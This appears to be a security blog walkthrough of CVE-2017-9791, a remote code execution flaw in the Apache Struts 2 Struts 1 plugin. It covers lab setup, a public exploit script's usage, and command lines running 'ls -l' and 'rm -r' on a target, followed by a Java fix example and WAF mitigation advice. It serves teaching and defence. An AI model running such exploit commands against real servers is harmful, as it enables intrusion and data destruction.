Apache Struts 1-2 Plugin Showcase OGNL Code Execution : CVE-2017-9791 | Video | Lucideus

[Difficulty: High, CVSS v3 Score: 9.8 → Critical]



Introduction

The Struts 1 plugin for Apache Struts 2 lets developers reuse existing Struts 1 Actions and ActionForms inside a Struts 2 application.
A few days ago, the Apache Software Foundation published security advisory S2-048, describing a possible Remote Code Execution (RCE) attack through a malicious field value when that Struts 1 plugin is used with Apache Struts 2. The vulnerability was reported by Icez, Nixawk, and Xfer0 and has been assigned CVE-2017-9791. The affected code is the Struts 1 plugin example in the Struts Showcase app of the Struts 2.3.x series, where the malicious field value ends up in Object Graph Navigation Language (OGNL) expressions.

Apache Struts
Apache Struts is a mainstream web framework widely used to develop modern Java-based web applications. It is used by Fortune 100 companies across sectors such as education, government, finance, retail and media. Two major versions have been released: Apache Struts 1, initially released in May 2000, which became a top-level Apache project, and Apache Struts 2, whose first full release came in February 2007. Both rely on plugins for much of their functionality.

Vulnerable Application Framework | Vulnerability Type
Apache Struts 2.3.x before 2.3.32 | Input Validation (CWE-20)

Walkthrough
  • First, set up a vulnerable Apache Struts 2 web application. The demo Showcase application can be downloaded from here.
  • Download the exploit script. The exploit is publicly available here: Struts2-048.
  • Download and configure Tomcat 7 on a local server/droplet from here.

Proof Of Concept
  • Download struts2-showcase-2.3.12.war and copy it into the Tomcat webapps directory with the following command.
          # cp ~/Downloads/struts2-showcase-2.3.12.war /opt/apache-tomcat-7.0.88/webapps/
  • Start the Tomcat server with the command below.
          # /opt/apache-tomcat-7.0.88/bin/startup.sh
  • Tomcat automatically deploys struts2-showcase-2.3.12.war by extracting it to struts2-showcase-2.3.12 under the webapps directory. The Struts app can then be reached at the address below.
          http://localhost:8080/struts2-showcase-2.3.12/showcase.action
  • Now let's exploit this using the exploit script downloaded from GitHub here.
  • The following changes have to be made to the script for it to work.

def Usage():
    # Usage text of the public exploit script; the host, port and showcase
    # version in these URLs are the values that must be edited.
    print('check:')
    print('    python file.py http://ip:8080/struts2-showcase-version/integration/saveGangster.action')
    print('poc:')
    print('    python file.py http://ip:8080/struts2-showcase-version/integration/saveGangster.action "command"')

Note: We need to change the IP and version to match the target server's configuration.
  • To execute the RCE, we need to use the following command syntax.
          # python scriptname.py http://ip:8080/struts2-showcase-version/saveGangster.action "command"

  • Execution:
The output of a successful execution is shown below.
          # python scriptname.py http://ip:8080/struts2-showcase-version/saveGangster.action "ls -l"

          # python scriptname.py http://ip:8080/struts2-showcase-version/saveGangster.action "rm -r GotAccess"

Conclusion


Apache Struts 2.3.x with the Struts 1 plugin and a Struts 1 action are the versions reported as vulnerable. As a solution, the vendor recommends always using resource keys instead of passing a raw message to ActionMessage, or upgrading to the Apache Struts 2.5.x series.
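The vendor's recommendation, as an added illustration that is not code from the advisory, the Struts project or the original post: a Struts 1 action in the style of the showcase's saveGangster example, with the vulnerable pattern (untrusted input built into the ActionMessage key) commented out beside the fixed one (a constant resource key, the input passed only as a message argument). The class, form and resource key names are assumed.

```java
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.struts.action.Action;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;
import org.apache.struts.action.ActionMessage;
import org.apache.struts.action.ActionMessages;

// Assumed Struts 1 action in the style of the showcase's saveGangster example;
// class, form and resource key names are illustrative, not from the showcase.
public class SaveRecordAction extends Action {

    // Minimal ActionForm carrying the request field an attacker controls.
    public static class RecordForm extends ActionForm {
        private String name;
        public String getName() { return name; }
        public void setName(String name) { this.name = name; }
    }

    @Override
    public ActionForward execute(ActionMapping mapping, ActionForm form,
                                 HttpServletRequest request,
                                 HttpServletResponse response) {
        String name = ((RecordForm) form).getName();   // untrusted input
        ActionMessages messages = new ActionMessages();

        // VULNERABLE (the S2-048 pattern): the untrusted value is concatenated
        // into the message key. The Struts 1 plugin resolves the message through
        // Struts 2's text lookup; with no matching bundle entry the raw string is
        // used as the message text, and message text is expression-evaluated.
        // messages.add(ActionMessages.GLOBAL_MESSAGE,
        //         new ActionMessage("Record " + name + " saved successfully"));

        // FIXED (vendor advice): a constant resource key, e.g. the bundle entry
        //   record.saved=Record {0} saved successfully   (assumed to exist).
        // The value is passed only as a MessageFormat argument, substituted
        // after the message text has been resolved, so it is never evaluated.
        messages.add(ActionMessages.GLOBAL_MESSAGE,
                new ActionMessage("record.saved", name));

        saveMessages(request, messages);
        return mapping.findForward("success");
    }
}
```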

An alternative to the formal fix, which can be costly and time-consuming, is "virtual patching". Instead of leaving a web application exposed to attack while the code is being modified after a vulnerability is found, virtual patching actively protects the application, reducing the window of exposure and the cost of emergency fix cycles until a proper patch can be applied.
Web Application Firewalls (WAF) and Unified Threat Management (UTM) systems are examples of products that can provide virtual patching. Their advantages include the following:

  1. It doesn't interfere with the normal application workflow.
  2. It keeps site(s) protected and attackers out of reach.
  3. It allows site owners to control the patching timeline.
  4. A WAF such as mod_security could mitigate this attack if its rules whitelist valid content types or blacklist OGNL expressions.

References
  1. https://www.rapid7.com/db/modules/exploit/mult/http/struts2_code_exec_showcase
  2. https://www.exploit-db.com/exploits/44643
  3. https://nvd.nist.gov/vuln/detail/CVE-2017-9791
  4. https://cwiki.apache.org/confluence/display/WW/S2-048